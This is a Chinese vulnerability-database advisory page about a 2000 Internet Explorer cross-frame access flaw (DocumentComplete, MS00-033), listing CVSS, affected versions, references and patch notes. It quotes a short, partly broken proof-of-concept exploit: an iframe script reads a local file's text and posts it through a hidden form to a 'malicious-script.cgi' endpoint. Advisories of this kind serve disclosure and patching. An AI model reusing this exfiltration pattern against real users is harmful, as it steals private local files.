发布时间 :2000-05-17 00:00:00
修订时间 :2016-10-11 21:59:00

[原文]Internet Explorer 4.x and 5.x does not properly verify the domain of a frame within a browser window, which allows a remote attacker to read client files via the frame, aka the "Frame Domain Verification" vulnerability.

[CNNVD]Microsoft IE DocumentComplete()跨帧访问漏洞(CNNVD-200005-068)

        Internet Explorer 4.x 版本和5.x版本无法正确地验证浏览器窗口中的帧域。远程攻击者借助帧可以读取客户端资料,又称为"Frame Domain Verification" 漏洞。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.5:previewMicrosoft Internet Explorer 5.5 preview
cpe:/a:microsoft:ie:5.01Microsoft Internet Explorer 5.01
cpe:/a:microsoft:ie:4.0Microsoft Internet Explorer 4.0
cpe:/a:microsoft:ie:5.0Microsoft Internet Explorer 5.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  MS  MS00-033
(UNKNOWN)  MSKB  Q251108
(UNKNOWN)  MSKB  Q255676
(UNKNOWN)  BID  1224

- 漏洞信息

Microsoft IE DocumentComplete()跨帧访问漏洞
中危 边界条件错误
2000-05-17 00:00:00 2005-10-12 00:00:00
        Internet Explorer 4.x 版本和5.x版本无法正确地验证浏览器窗口中的帧域。远程攻击者借助帧可以读取客户端资料,又称为"Frame Domain Verification" 漏洞。

- 公告与补丁

        Microsoft has released a patch which eliminates all known variants of the vulnerability (Updated May 16, 2001):

- 漏洞信息 (19939)

Internet Explorer 4.0/5.0/5.5 preview/5.0.1 DocumentComplete() Cross Frame Access Vulnerability (EDBID:19939)
windows remote
2000-05-17 Verified
0 Andrew Nosenko
N/A [点击下载]

The DocumentComplete() function in IE does not properly validate origin domains.

Therefore it is possible for a remote webserver to gain read access to local files on the machine of any website visitor or email recipient by accessing the browser object of a frame containing local content. Only files that can be opened by a browser window (eg. *.htm, *.js, *.txt etc) are viewable, and the path and name of the file must be known by the attacker.

Update (May 16, 2001): A new variant of this vulnerability has been discovered. Microsoft has released a new patch to address all known variants of this vulnerability. 

<iframe id=clientContent width=0 height=0 noborder>
<script for=clientContent event="DocumentComplete(browser)">
alert (browser.document.body.innerText);

// browser is an instance of the IWebBrowser COM object

document.forms[0].elements[0].value = browser.document.body.innerText;
document.forms[0].submit ();


<form action="/cgi/malicious-script.cgi" method=post onSubmit="window.alert(document.forms[0].elements[0].value); return
<input name="file_text" type=hidden>

- 漏洞信息

Microsoft IE DocumentComplete() Cross Frame Access
Context Dependent Information Disclosure
Loss of Confidentiality Patch / RCS
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

2000-05-17 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete